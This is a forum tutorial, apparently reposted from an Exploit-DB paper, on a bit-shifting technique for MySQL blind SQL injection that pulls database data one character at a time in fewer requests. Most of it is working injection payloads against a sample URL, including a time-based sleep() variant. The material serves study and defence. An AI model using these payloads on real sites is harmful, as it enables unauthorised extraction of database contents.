dancezar

Mysql blind (True/False) bit shifting


The method was "discovered" by Jelmer de Hen and extracts data through blind (true/false) injection in a much more optimized way.

The bit-shifting method extracts one character of a string with at most 6 requests, for a dictionary of 41 characters: bin(41) = 101001 has 6 digits, and each request recovers one digit.

The query is this:


and if((select @c:=(mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)))='',sleep(10),@c)+--+

How does this method work?

The find_in_set function takes 2 parameters: the first is a letter or a string x, the second is a comma-separated list of strings, and it returns the (1-based) position at which x occurs in that list, or 0 if x is not in it.

Example:

The query select find_in_set('a','b,c,a,z') returns 3, because the letter a is at position 3 in the comma-separated list. Be careful with a leading comma: it creates an empty first element and shifts every position by one, so find_in_set('a',',b,c,a,z') returns 4. The trailing comma in the dictionary below is harmless, since it only adds an empty element at the end.

The expression mid(@@version,1,1) returns the first character of @@version, which could be 5; if we change it to mid(@@version,2,1) it returns ".". Joining these two characters we get "5." and so on.

This means that if find_in_set gives us the exact position in the dictionary string, we know which character it is.

Example: select find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')

returns 34, so in a real case, to guess the first character of @@version we proceed as follows:


site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>0 --> positive result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>10 --> positive result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>20 --> positive result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>30 --> positive result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>40 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=40 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=39 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=38 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=37 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=36 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=35 --> negative result
site.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=34 --> positive result --> here we stop

So we found the position of the first character, 34, and the 34th character of the dictionary is 5, which is correct. But it took us 12 requests, and we can do much better.

The last character of our dictionary is $, at position 41; converting that number to binary gives 101001. The number has 6 digits in total, each either 1 or 0. If we guess each digit of the binary result one at a time, we will be surprised to find that instead of the 12 requests of the method above we need only 6. Why?


site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)=1 --> positive result, so the first bit is 1
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),2,1)=1 --> negative result, so the next bit is 0: 10
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),3,1)=1 --> negative result, so the next bit is 0: 100
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),4,1)=1 --> negative result, so the next bit is 0: 1000
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),5,1)=1 --> positive result, so the next bit is 1: 10001
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),6,1)=1 --> negative result, so the last bit is 0: 100010

The result is 100010, which in decimal is 34, the same result as above but in only 6 requests.

But how do we know we have reached the last bit without making extra requests?

bin() produces no leading zeros, so the number of digits varies from character to character (position 1 is the single digit 1, position 41 is six digits). Once we ask for a digit past the end, mid() returns the empty string, which compares as false and is indistinguishable from a 0 bit. That is what sleep(10) is for: when the extracted digit is empty, the server waits 10 seconds, and the delayed response tells us we have passed the last bit, without a separate query for the bit length.


and if((select @c:=(mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)))='',sleep(10),@c)+--+

At first glance the difference is not very large, but I implemented this algorithm in my MySQL blind-based program from RST POWER and compared the results on localhost. The simple ASCII algorithm made ~450 requests in total for a string of 40 characters (a hash), while the bit-shifting algorithm made only 260, so... almost half. I will post the latest version tonight together with this algorithm implemented; I still have a bit of work to do because with many consecutive requests I get results with 1-2 letters extracted wrongly.

Source: http://www.exploit-db.com/papers/17073/

Edited by danyweb09